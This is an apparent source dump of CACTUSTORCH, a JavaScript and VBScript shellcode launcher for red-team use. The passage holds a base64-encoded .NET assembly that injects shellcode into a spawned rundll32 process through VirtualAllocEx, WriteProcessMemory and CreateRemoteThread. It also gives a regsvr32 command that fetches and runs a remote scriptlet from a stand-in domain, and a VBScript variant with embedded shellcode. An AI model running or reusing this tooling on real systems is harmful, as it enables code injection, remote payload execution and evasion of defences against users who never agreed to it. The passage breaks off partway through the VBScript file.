"bWwsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdh"+ 80 | "NWM1NjE5MzRlMDg5BhQAAAAHdGFyZ2V0MAkGAAAABhYAAAAaU3lzdGVtLlJlZmxlY3Rpb24uQXNz"+ 81 | "ZW1ibHkGFwAAAARMb2FkCg8MAAAAAB4AAAJNWpAAAwAAAAQAAAD//wAAuAAAAAAAAABAAAAAAAAA"+ 82 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAADh+6DgC0Cc0huAFMzSFUaGlzIHByb2dy"+ 83 | "YW0gY2Fubm90IGJlIHJ1biBpbiBET1MgbW9kZS4NDQokAAAAAAAAAFBFAABMAQMAWIaiWgAAAAAA"+ 84 | "AAAA4AAiIAsBMAAAFgAAAAYAAAAAAADuNQAAACAAAABAAAAAAAAQACAAAAACAAAEAAAAAAAAAAQA"+ 85 | "AAAAAAAAAIAAAAACAAAAAAAAAwBAhQAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAAnDUA"+ 86 | "AE8AAAAAQAAAkAMAAAAAAAAAAAAAAAAAAAAAAAAAYAAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 87 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAIAAAAAAAAAAAAAAAIIAAASAAAAAAAAAAA"+ 88 | "AAAALnRleHQAAAD0FQAAACAAAAAWAAAAAgAAAAAAAAAAAAAAAAAAIAAAYC5yc3JjAAAAkAMAAABA"+ 89 | 
"AAAABAAAABgAAAAAAAAAAAAAAAAAAEAAAEAucmVsb2MAAAwAAAAAYAAAAAIAAAAcAAAAAAAAAAAA"+ 90 | "AAAAAABAAABCAAAAAAAAAAAAAAAAAAAAANA1AAAAAAAASAAAAAIABQAMIgAAkBMAAAEAAAAAAAAA"+ 91 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgIoDwAACioT"+ 92 | "MAoAHAEAAAEAABEEKBAAAAoKEgEGjmkoEQAACnMKAAAGDAgWfTUAAARyAQAAcBMEcgMAAHAoEgAA"+ 93 | "Cm8TAAAKFjEZch0AAHAoEgAACnIrAABwAygUAAAKEwQrF3IdAABwKBIAAApyQQAAcAMoFAAAChME"+ 94 | "EQQUFBQXGn4VAAAKFAgSAygBAAAGJgl7BAAABBMFEgUoFgAACnJXAABwKBcAAAo5gAAAABEFFnMR"+ 95 | "AAAKByAAMAAAGigCAAAGEwYSBigWAAAKclcAAHAoGAAACiwKEQUWKAUAAAYmKhYTBxIIBo5pKBEA"+ 96 | "AAoRBREGBhEIEQcoBAAABiYRBREGBx8gFnMRAAAKKAMAAAYmEQUWcxEAAAoWEQYWcxEAAAoWFnMR"+ 97 | "AAAKKAYAAAYmKnoCfhUAAAp9AgAABAIoDwAACgICKBkAAAp9AQAABCoAEzACAGAAAAAAAAAAAn4V"+ 98 | "AAAKfSsAAAQCfhUAAAp9LAAABAJ+FQAACn0tAAAEAn4VAAAKfTgAAAQCfhUAAAp9OQAABAJ+FQAA"+ 99 | "Cn06AAAEAn4VAAAKfTsAAAQCKA8AAAoCAigZAAAKfSoAAAQqQlNKQgEAAQAAAAAADAAAAHYyLjAu"+ 100 | "NTA3MjcAAAAABQBsAAAAXAcAACN+AADIBwAAdAkAACNTdHJpbmdzAAAAADwRAABcAAAAI1VTAJgR"+ 101 | "AAAQAAAAI0dVSUQAAACoEQAA6AEAACNCbG9iAAAAAAAAAAIAAAFXHQIUCQIAAAD6ATMAFgAAAQAA"+ 102 | "ABcAAAAJAAAAUAAAAAoAAAAkAAAAGQAAADMAAAASAAAAAQAAAAEAAAAGAAAAAQAAAAEAAAAHAAAA"+ 103 | "AACZBgEAAAAAAAYAXAWSBwYAyQWSBwYAigRgBw8AsgcAAAYAsgThBgYAMAXhBgYAEQXhBgYAsAXh"+ 104 | "BgYAfAXhBgYAlQXhBgYAyQThBgYAngRzBwYAfARzBwYA9AThBgYAqwipBgYAYQSpBgYATQWpBgYA"+ 105 | "sAapBgYA5AipBgYAWQepBgYA2AipBgYAZgapBgYAhAZzBwAAAAAlAAAAAAABAAEAAQAQAG0GAAA9"+ 106 | "AAEAAQAKABAA+AcAAD0AAQAJAAoBEADOBgAAQQAEAAoAAgEAABsIAABJAAgACgACAQAANggAAEkA"+ 107 | "JwAKAAoAEAAGBwAAPQAqAAoAAgEAAG0EAABJADwACwACAQAA8wYAAEkARQALAAYAfQb6AAYARAc/"+ 108 | "AAYAJAT9AAYAdAg/AAYA5wM/AAYAyAP6AAYAvQP6AAYGngMAAVaAsgIDAVaAwAIDAVaAZAADAVaA"+ 109 | "iAIDAVaAwgADAVaAUwIDAVaA8QEDAVaAHQIDAVaABQIDAVaAoAEDAVaAAgMDAVaAXgEDAVaASAED"+ 110 | "AVaA4QEDAVaATQIDAVaAMQIDAVaAagMDAVaAggMDAVaAmQIDAVaAHQMDAVaAdgEDAVaAdQADAVaA"+ 111 | "PQADAVaAJwEDAVaAqAADAVaAOgMDAVaAuQEDAVaAGAEDAVaAxgEDAVaA5QIDAQYGngMAAVaAkQAH"+ 112 | 
"AVaAcgIHAQYApgP6AAYA7wM/AAYAFwc/AAYAMwQ/AAYASwP6AAYAmgP6AAYA5wX6AAYA7wX6AAYA"+ 113 | "Rwj6AAYAVQj6AAYA5AT6AAYALgj6AAYAAQkLAQYADQALAQYAGQA/AAYA7Ag/AAYA9gg/AAYANAc/"+ 114 | "AAYGngMAAVaA3gIOAVaA7wAOAVaAnQEOAVaA2AIOAVaA1QEOAVaADwEOAVaAlAEOAVaAAwEOAQYG"+ 115 | "ngMAAVaA5wASAVaAVwASAVaA1QASAVaAWAMSAVaAaQISAVaATwMSAVaA3QASAVaAYAMSAVaAEQYS"+ 116 | "AVaAJAYSAVaAOQYSAQAAAACAAJYgLgAWAQEAAAAAAIAAliANCSoBCwAAAAAAgACWIBwJNQEQAAAA"+ 117 | "AACAAJYgNAk/ARUAAAAAAIAAliBjCEkBGgAAAAAAgACRINQDTwEcAFAgAAAAAIYYPgcGACMAWCAA"+ 118 | "AAAAhgBNBFoBIwCAIQAAAACGGD4HBgAlAKAhAAAAAIYYPgcGACUAAAABADsEAAACAFMEAAADAOQH"+ 119 | "AAAEANEHAAAFAMEHAAAGAAsIAAAHANYIAAAIAEcJAQAJAAQHAgAKAMwGAAABABsEAAACAIsIAAAD"+ 120 | "AAMGAAAEAGsEAAAFAL8IAAABABsEAAACAIsIAAADAAMGAAAEAMkIAAAFALIIAAABAHQIAAACAH0I"+ 121 | "AAADACEHAAAEAAMGAAAFALUGAAABAHQIAAACAPoDAAABAHQIAAACANEHAAADAPcFAAAEAJUIAAAF"+ 122 | "ACgHAAAGAAsIAAAHALIDAAABAC0JAAACAAEACQA+BwEAEQA+BwYAGQA+BwoAKQA+BxAAMQA+BxAA"+ 123 | "OQA+BxAAQQA+BxAASQA+BxAAUQA+BxAAWQA+BxAAYQA+BxUAaQA+BxAAcQA+BxAAiQA+BwYAeQA+"+ 124 | "BwYAmQBTBikAoQA+BwEAqQAEBC8AsQB5BjQAsQCkCDgAoQASBz8AoQBkBkIAsQBmCUYAsQBaCUYA"+ 125 | "uQAKBkwACQAkAFoACQAoAF8ACQAsAGQACQAwAGkACQA0AG4ACQA4AHMACQA8AHgACQBAAH0ACQBE"+ 126 | "AIIACQBIAIcACQBMAIwACQBQAJEACQBUAJYACQBYAJsACQBcAKAACQBgAKUACQBkAKoACQBoAK8A"+ 127 | "CQBsALQACQBwALkACQB0AL4ACQB4AMMACQB8AMgACQCAAM0ACQCEANIACQCIANcACQCMANwACQCQ"+ 128 | "AOEACQCUAOYACQCYAOsACQCgAFoACQCkAF8ACQD0AJYACQD4AJsACQD8APAACQAAAbkACQAEAeEA"+ 129 | "CQAIAfUACQAMAb4ACQAQAcMACQAYAW4ACQAcAXMACQAgAXgACQAkAX0ACQAoAVoACQAsAV8ACQAw"+ 130 | "AWQACQA0AWkACQA4AYIACQA8AYcACQBAAYwALgALAGABLgATAGkBLgAbAIgBLgAjAJEBLgArAJEB"+ 131 | "LgAzAKIBLgA7AKIBLgBDAJEBLgBLAJEBLgBTAKIBLgBbAKgBLgBjAK4BLgBrANgBQwBbAKgBowBz"+ 132 | "AFoAwwBzAFoAAwFzAFoAIwFzAFoAGgCMBgABAwAuAAEAAAEFAA0JAQAAAQcAHAkBAAABCQA0CQEA"+ 133 | "AAELAGMIAQAAAQ0A1AMBAASAAAABAAAAAAAAAAAAAAAAAPcAAAACAAAAAAAAAAAAAABRAKkDAAAA"+ 134 | "AAMAAgAEAAIABQACAAYAAgAHAAIACAACAAkAAgAAAAAAAHNoZWxsY29kZTMyAGNiUmVzZXJ2ZWQy"+ 135 | 
"AGxwUmVzZXJ2ZWQyADxNb2R1bGU+AENyZWF0ZVByb2Nlc3NBAENSRUFURV9CUkVBS0FXQVlfRlJP"+ 136 | "TV9KT0IARVhFQ1VURV9SRUFEAENSRUFURV9TVVNQRU5ERUQAUFJPQ0VTU19NT0RFX0JBQ0tHUk9V"+ 137 | "TkRfRU5EAERVUExJQ0FURV9DTE9TRV9TT1VSQ0UAQ1JFQVRFX0RFRkFVTFRfRVJST1JfTU9ERQBD"+ 138 | "UkVBVEVfTkVXX0NPTlNPTEUARVhFQ1VURV9SRUFEV1JJVEUARVhFQ1VURQBSRVNFUlZFAENBQ1RV"+ 139 | "U1RPUkNIAFdSSVRFX1dBVENIAFBIWVNJQ0FMAFBST0ZJTEVfS0VSTkVMAENSRUFURV9QUkVTRVJW"+ 140 | "RV9DT0RFX0FVVEhaX0xFVkVMAENSRUFURV9TSEFSRURfV09XX1ZETQBDUkVBVEVfU0VQQVJBVEVf"+ 141 | "V09XX1ZETQBQUk9DRVNTX01PREVfQkFDS0dST1VORF9CRUdJTgBUT1BfRE9XTgBHTwBDUkVBVEVf"+ 142 | "TkVXX1BST0NFU1NfR1JPVVAAUFJPRklMRV9VU0VSAFBST0ZJTEVfU0VSVkVSAExBUkdFX1BBR0VT"+ 143 | "AENSRUFURV9GT1JDRURPUwBJRExFX1BSSU9SSVRZX0NMQVNTAFJFQUxUSU1FX1BSSU9SSVRZX0NM"+ 144 | "QVNTAEhJR0hfUFJJT1JJVFlfQ0xBU1MAQUJPVkVfTk9STUFMX1BSSU9SSVRZX0NMQVNTAEJFTE9X"+ 145 | "X05PUk1BTF9QUklPUklUWV9DTEFTUwBOT0FDQ0VTUwBEVVBMSUNBVEVfU0FNRV9BQ0NFU1MAREVU"+ 146 | "QUNIRURfUFJPQ0VTUwBDUkVBVEVfUFJPVEVDVEVEX1BST0NFU1MAREVCVUdfUFJPQ0VTUwBERUJV"+ 147 | "R19PTkxZX1RISVNfUFJPQ0VTUwBSRVNFVABDT01NSVQAQ1JFQVRFX0lHTk9SRV9TWVNURU1fREVG"+ 148 | "QVVMVABDUkVBVEVfVU5JQ09ERV9FTlZJUk9OTUVOVABFWFRFTkRFRF9TVEFSVFVQSU5GT19QUkVT"+ 149 | "RU5UAENSRUFURV9OT19XSU5ET1cAZHdYAFJFQURPTkxZAEVYRUNVVEVfV1JJVEVDT1BZAElOSEVS"+ 150 | "SVRfUEFSRU5UX0FGRklOSVRZAElOSEVSSVRfQ0FMTEVSX1BSSU9SSVRZAGR3WQB2YWx1ZV9fAGNi"+ 151 | "AG1zY29ybGliAGxwVGhyZWFkSWQAZHdUaHJlYWRJZABkd1Byb2Nlc3NJZABDcmVhdGVSZW1vdGVU"+ 152 | "aHJlYWQAaFRocmVhZABscFJlc2VydmVkAHVFeGl0Q29kZQBHZXRFbnZpcm9ubWVudFZhcmlhYmxl"+ 153 | "AGxwSGFuZGxlAGJJbmhlcml0SGFuZGxlAGxwVGl0bGUAbHBBcHBsaWNhdGlvbk5hbWUAZmxhbWUA"+ 154 | "bHBDb21tYW5kTGluZQBWYWx1ZVR5cGUAZmxBbGxvY2F0aW9uVHlwZQBHdWlkQXR0cmlidXRlAERl"+ 155 | "YnVnZ2FibGVBdHRyaWJ1dGUAQ29tVmlzaWJsZUF0dHJpYnV0ZQBBc3NlbWJseVRpdGxlQXR0cmli"+ 156 | "dXRlAEFzc2VtYmx5VHJhZGVtYXJrQXR0cmlidXRlAGR3RmlsbEF0dHJpYnV0ZQBBc3NlbWJseUZp"+ 157 | "bGVWZXJzaW9uQXR0cmlidXRlAEFzc2VtYmx5Q29uZmlndXJhdGlvbkF0dHJpYnV0ZQBBc3NlbWJs"+ 158 | 
"eURlc2NyaXB0aW9uQXR0cmlidXRlAEZsYWdzQXR0cmlidXRlAENvbXBpbGF0aW9uUmVsYXhhdGlv"+ 159 | "bnNBdHRyaWJ1dGUAQXNzZW1ibHlQcm9kdWN0QXR0cmlidXRlAEFzc2VtYmx5Q29weXJpZ2h0QXR0"+ 160 | "cmlidXRlAEFzc2VtYmx5Q29tcGFueUF0dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0dHJp"+ 161 | "YnV0ZQBkd1hTaXplAGR3WVNpemUAZHdTdGFja1NpemUAZHdTaXplAFNpemVPZgBHVUFSRF9Nb2Rp"+ 162 | "ZmllcmZsYWcATk9DQUNIRV9Nb2RpZmllcmZsYWcAV1JJVEVDT01CSU5FX01vZGlmaWVyZmxhZwBG"+ 163 | "cm9tQmFzZTY0U3RyaW5nAFRvU3RyaW5nAGNhY3R1c1RvcmNoAGdldF9MZW5ndGgATWFyc2hhbABr"+ 164 | "ZXJuZWwzMi5kbGwAQ0FDVFVTVE9SQ0guZGxsAFN5c3RlbQBFbnVtAGxwTnVtYmVyT2ZCeXRlc1dy"+ 165 | "aXR0ZW4AbHBQcm9jZXNzSW5mb3JtYXRpb24AU3lzdGVtLlJlZmxlY3Rpb24ATWVtb3J5UHJvdGVj"+ 166 | "dGlvbgBscFN0YXJ0dXBJbmZvAFplcm8AbHBEZXNrdG9wAGJ1ZmZlcgBscFBhcmFtZXRlcgBoU3Rk"+ 167 | "RXJyb3IALmN0b3IAbHBTZWN1cml0eURlc2NyaXB0b3IASW50UHRyAFN5c3RlbS5EaWFnbm9zdGlj"+ 168 | "cwBTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2VydmljZXMAU3lzdGVtLlJ1bnRpbWUuQ29tcGlsZXJT"+ 169 | "ZXJ2aWNlcwBEZWJ1Z2dpbmdNb2RlcwBiSW5oZXJpdEhhbmRsZXMAbHBUaHJlYWRBdHRyaWJ1dGVz"+ 170 | "AGxwUHJvY2Vzc0F0dHJpYnV0ZXMAU2VjdXJpdHlBdHRyaWJ1dGVzAGR3Q3JlYXRpb25GbGFncwBD"+ 171 | "cmVhdGVQcm9jZXNzRmxhZ3MAZHdGbGFncwBEdXBsaWNhdGVPcHRpb25zAGR3WENvdW50Q2hhcnMA"+ 172 | "ZHdZQ291bnRDaGFycwBUZXJtaW5hdGVQcm9jZXNzAGhQcm9jZXNzAGxwQmFzZUFkZHJlc3MAbHBB"+ 173 | "ZGRyZXNzAGxwU3RhcnRBZGRyZXNzAENvbmNhdABPYmplY3QAZmxPbGRQcm90ZWN0AGZsUHJvdGVj"+ 174 | "dABmbE5ld1Byb3RlY3QAbHBFbnZpcm9ubWVudABDb252ZXJ0AGhTdGRJbnB1dABoU3RkT3V0cHV0"+ 175 | "AHdTaG93V2luZG93AFZpcnR1YWxBbGxvY0V4AFZpcnR1YWxQcm90ZWN0RXgAYmluYXJ5AFdyaXRl"+ 176 | "UHJvY2Vzc01lbW9yeQBscEN1cnJlbnREaXJlY3RvcnkAb3BfRXF1YWxpdHkAb3BfSW5lcXVhbGl0"+ 177 | "eQAAAQAZUAByAG8AZwByAGEAbQBXADYANAAzADIAAA13AGkAbgBkAGkAcgAAFVwAUwB5AHMAVwBP"+ 178 | "AFcANgA0AFwAABVcAFMAeQBzAHQAZQBtADMAMgBcAAADMAAAABZi8URz/RpBkHALmYfP+r4ABCAB"+ 179 | "AQgDIAABBSABARERBCABAQ4EIAEBAg4HCR0FGBIcERAOGBgIGAUAAR0FDgQAAQ4OAyAACAYAAw4O"+ 180 | "Dg4CBhgDIAAOBQACAg4OBAABCBwIt3pcVhk04IkEAQAAAAQCAAAABAQAAAAECAAAAAQQAAAABCAA"+ 181 | 
"AAAEQAAAAASAAAAABAABAAAEAAIAAAQABAAABAAIAAAEABAAAAQAIAAABABAAAAEAIAAAAQAAAEA"+ 182 | "BAAAAgAEAAAEAAQAAAgABAAAEAAEAAAgAAQAAAABBAAAAAIEAAAABAQAAAAIBAAAABAEAAAAIAQA"+ 183 | "AABABAAAAIAEADAAAAQAAEAAAgYIAgYCAgYJAwYRFAMGERgCBgYDBhEgAwYRJBMAChgODhIMEgwC"+ 184 | "ERQYDhIcEBEQCgAFGBgYGBEgESQJAAUYGBgYESQYCQAFAhgYHQUYCAUAAgIYCQoABxgYGAkYGAkY"+ 185 | "BSACAQ4OCAEACAAAAAAAHgEAAQBUAhZXcmFwTm9uRXhjZXB0aW9uVGhyb3dzAQgBAAIAAAAAABAB"+ 186 | "AAtDQUNUVVNUT1JDSAAABQEAAAAABQEAAQAAKQEAJDU2NTk4ZjFjLTZkODgtNDk5NC1hMzkyLWFm"+ 187 | "MzM3YWJlNTc3NwAADAEABzEuMC4wLjAAAAAAAMQ1AAAAAAAAAAAAAN41AAAAIAAAAAAAAAAAAAAA"+ 188 | "AAAAAAAAAAAAAADQNQAAAAAAAAAAAAAAAF9Db3JEbGxNYWluAG1zY29yZWUuZGxsAAAAAAD/JQAg"+ 189 | "ABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAEAAAABgAAIAAAAAAAAAAAAAAAAAAAAEAAQAA"+ 190 | "ADAAAIAAAAAAAAAAAAAAAAAAAAEAAAAAAEgAAABYQAAANAMAAAAAAAAAAAAANAM0AAAAVgBTAF8A"+ 191 | "VgBFAFIAUwBJAE8ATgBfAEkATgBGAE8AAAAAAL0E7/4AAAEAAAABAAAAAAAAAAEAAAAAAD8AAAAA"+ 192 | "AAAABAAAAAIAAAAAAAAAAAAAAAAAAABEAAAAAQBWAGEAcgBGAGkAbABlAEkAbgBmAG8AAAAAACQA"+ 193 | "BAAAAFQAcgBhAG4AcwBsAGEAdABpAG8AbgAAAAAAAACwBJQCAAABAFMAdAByAGkAbgBnAEYAaQBs"+ 194 | "AGUASQBuAGYAbwAAAHACAAABADAAMAAwADAAMAA0AGIAMAAAADAADAABAEMAbwBtAG0AZQBuAHQA"+ 195 | "cwAAAEMAQQBDAFQAVQBTAFQATwBSAEMASAAAACIAAQABAEMAbwBtAHAAYQBuAHkATgBhAG0AZQAA"+ 196 | "AAAAAAAAAEAADAABAEYAaQBsAGUARABlAHMAYwByAGkAcAB0AGkAbwBuAAAAAABDAEEAQwBUAFUA"+ 197 | "UwBUAE8AUgBDAEgAAAAwAAgAAQBGAGkAbABlAFYAZQByAHMAaQBvAG4AAAAAADEALgAwAC4AMAAu"+ 198 | "ADAAAABAABAAAQBJAG4AdABlAHIAbgBhAGwATgBhAG0AZQAAAEMAQQBDAFQAVQBTAFQATwBSAEMA"+ 199 | "SAAuAGQAbABsAAAAPAAMAAEATABlAGcAYQBsAEMAbwBwAHkAcgBpAGcAaAB0AAAAQwBBAEMAVABV"+ 200 | "AFMAVABPAFIAQwBIAAAAKgABAAEATABlAGcAYQBsAFQAcgBhAGQAZQBtAGEAcgBrAHMAAAAAAAAA"+ 201 | "AABIABAAAQBPAHIAaQBnAGkAbgBhAGwARgBpAGwAZQBuAGEAbQBlAAAAQwBBAEMAVABVAFMAVABP"+ 202 | "AFIAQwBIAC4AZABsAGwAAAA4AAwAAQBQAHIAbwBkAHUAYwB0AE4AYQBtAGUAAAAAAEMAQQBDAFQA"+ 203 | "VQBTAFQATwBSAEMASAAAADQACAABAFAAcgBvAGQAdQBjAHQAVgBlAHIAcwBpAG8AbgAAADEALgAw"+ 204 | 
"AC4AMAAuADAAAAA4AAgAAQBBAHMAcwBlAG0AYgBsAHkAIABWAGUAcgBzAGkAbwBuAAAAMQAuADAA"+ 205 | "LgAwAC4AMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 206 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 207 | "AAAAAAAAAAAAAAAAADAAAAwAAADwNQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 208 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 209 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 210 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 211 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 212 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 213 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 214 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 215 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+ 216 | "AAAAAAAAAAAAAAABDQAAAAQAAAAJFwAAAAkGAAAACRYAAAAGGgAAACdTeXN0ZW0uUmVmbGVjdGlv"+ 217 | "bi5Bc3NlbWJseSBMb2FkKEJ5dGVbXSkIAAAACgsA"; 218 | var entry_class = 'cactusTorch'; 219 | 220 | try { 221 | setversion(); 222 | var stm = base64ToStream(serialized_obj); 223 | var fmt = new ActiveXObject('System.Runtime.Serialization.Formatters.Binary.BinaryFormatter'); 224 | var al = new ActiveXObject('System.Collections.ArrayList'); 225 | var n = fmt.SurrogateSelector; 226 | var d = fmt.Deserialize_2(stm); 227 | al.Add(n); 228 | var o = d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class); 229 | o.flame(binary,code); 230 | } catch (e) { 231 | debug(e.message); 232 | } -------------------------------------------------------------------------------- /CACTUSTORCH.sct: -------------------------------------------------------------------------------- 1 | /* 2 | ( ) ( ) 3 | ( ( ( * ) )\ ) * ) ( /( )\ ) ( ( /( 4 | )\ )\ )\ ` ) /( ( (()/(` ) /( )\())(()/( )\ )\()) 5 | 
(((_|(((_)( (((_) ( )(_)) )\ /(_))( )(_)|(_)\ /(_)|((_)((_)\ 6 | )\___)\ _ )\ )\___(_(_())_ ((_|_)) (_(_()) ((_)(_)) )\___ _((_) 7 | ((/ __(_)_\(_|(/ __|_ _| | | / __||_ _| / _ \| _ ((/ __| || | 8 | | (__ / _ \ | (__ | | | |_| \__ \ | | | (_) | /| (__| __ | 9 | \___/_/ \_\ \___| |_| \___/|___/ |_| \___/|_|_\ \___|_||_| 10 | 11 | Author: Vincent Yiu (@vysecurity) 12 | Credits: 13 | - @cn33liz: Inspiration from StarFighters 14 | - @tiraniddo: James Forshaw for DotNetToJScript 15 | - @armitagehacker: Raphael Mudge for the idea of selecting the 32 bit version of the binary to inject into on 64 bit architecture machines 16 | 17 | A JavaScript and VBScript shellcode launcher. This will spawn a 32 bit version of the binary specified and inject shellcode into it. 18 | 19 | Usage: 20 | Choose a binary you want to inject into, default "rundll32.exe", you can use notepad.exe, calc.exe for example... 21 | Generate 32 bit raw shellcode in whatever framework you want. Tested: Cobalt Strike, Metasploit Framework 22 | Run: cat payload.bin | base64 -w 0 23 | Copy the base64 encoded payload into the code variable below.
24 | 25 | Execute: regsvr32 /s /n /u /i:http://domain.com/cactustorch.sct scrobj.dll 26 | 27 | */ 28 | 29 | 30 | 31 | 33 | 38 | 248 | 249 | 250 | -------------------------------------------------------------------------------- /CACTUSTORCH.vbe: -------------------------------------------------------------------------------- 1 | ' ( ) ( ) 2 | ' ( ( ( * ) )\ ) * ) ( /( )\ ) ( ( /( 3 | ' )\ )\ )\ ` ) /( ( (()/(` ) /( )\())(()/( )\ )\()) 4 | ' (((_|(((_)( (((_) ( )(_)) )\ /(_))( )(_)|(_)\ /(_)|((_)((_)\ 5 | ' )\___)\ _ )\ )\___(_(_())_ ((_|_)) (_(_()) ((_)(_)) )\___ _((_) 6 | '((/ __(_)_\(_|(/ __|_ _| | | / __||_ _| / _ \| _ ((/ __| || | 7 | ' | (__ / _ \ | (__ | | | |_| \__ \ | | | (_) | /| (__| __ | 8 | ' \___/_/ \_\ \___| |_| \___/|___/ |_| \___/|_|_\ \___|_||_| 9 | ' 10 | ' Author: Vincent Yiu (@vysecurity) 11 | ' Credits: 12 | ' - @cn33liz: Inspiration from StarFighters 13 | ' - @tiraniddo: James Forshaw for DotNetToJScript 14 | ' - @armitagehacker: Raphael Mudge for the idea of selecting the 32 bit version of the binary to inject into on 64 bit architecture machines 15 | 16 | ' A JavaScript and VBScript shellcode launcher. This will spawn a 32 bit version of the binary specified and inject shellcode into it. 17 | 18 | ' Usage: 19 | ' Choose a binary you want to inject into, default "rundll32.exe", you can use notepad.exe, calc.exe for example... 20 | ' Generate 32 bit raw shellcode in whatever framework you want. Tested: Cobalt Strike, Metasploit Framework 21 | ' Run: cat payload.bin | base64 -w 0 22 | ' Copy the base64 encoded payload into the code variable below. 23 | 24 | ' Replace with binary name that you want to inject into.
This can be anything that exists both in SYSWOW64 and SYSTEM32 25 | Dim binary : binary = "rundll32.exe" 26 | 27 | ' Base64 encoded 32 bit shellcode 28 | Dim code : code = "TVroAAAAAFtSRVWJ5YHDcoAAAP/TicNXaAQAAABQ/9Bo8LWiVmgFAAAAUP/TAAAAAAAAAAAAAAAAAAAA8AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAACf0hwW27NyRduzckXbs3JFZvzkRdqzckXF4fZF8rNyRcXh50XIs3JFxeHxRVqzckX8dQlF1LNyRduzc0UGs3JFxeH7RWKzckXF4eBF2rNyRcXh40Xas3JFUmljaNuzckUAAAAAAAAAAAAAAAAAAAAAUEUAAEwBBQBOViNZAAAAAAAAAADgAAKhCwEJAABCAgAA4gAAAAAAAFFvAQAAEAAAAGACAAAAABAAEAAAAAIAAAUAAAAAAAAABQAAAAA" 29 | 30 | ' ---------- DO NOT EDIT BELOW HERE ----------- 31 | 32 | Sub Debug(s) 33 | End Sub 34 | Sub SetVersion 35 | Dim shell 36 | Set shell = CreateObject("WScript.Shell") 37 | Dim ver 38 | ver = "v4.0.30319" 39 | On Error Resume Next 40 | shell.RegRead "HKLM\SOFTWARE\\Microsoft\.NETFramework\v4.0.30319\" 41 | If Err.Number <> 0 Then 42 | ver = "v2.0.50727" 43 | Err.Clear 44 | End If 45 | shell.Environment("Process").Item("COMPLUS_Version") = ver 46 | End Sub 47 | Function Base64ToStream(b) 48 | Dim enc, length, ba, transform, ms 49 | Set enc = CreateObject("System.Text.ASCIIEncoding") 50 | length = enc.GetByteCount_2(b) 51 | Set transform = CreateObject("System.Security.Cryptography.FromBase64Transform") 52 | Set ms = CreateObject("System.IO.MemoryStream") 53 | ms.Write transform.TransformFinalBlock(enc.GetBytes_4(b), 0, length), 0, ((length / 4) * 3) 54 | ms.Position = 0 55 | Set Base64ToStream = ms 56 | End Function 57 | 58 | Sub Run 59 | Dim s, entry_class 60 | s = "AAEAAAD/////AQAAAAAAAAAEAQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVy" 61 | s = s & "AwAAAAhEZWxlZ2F0ZQd0YXJnZXQwB21ldGhvZDADAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXph" 62 | s = s & "dGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5IlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xk" 63 | s = s & "ZXIvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIJAgAAAAkD" 64 | s = s & 
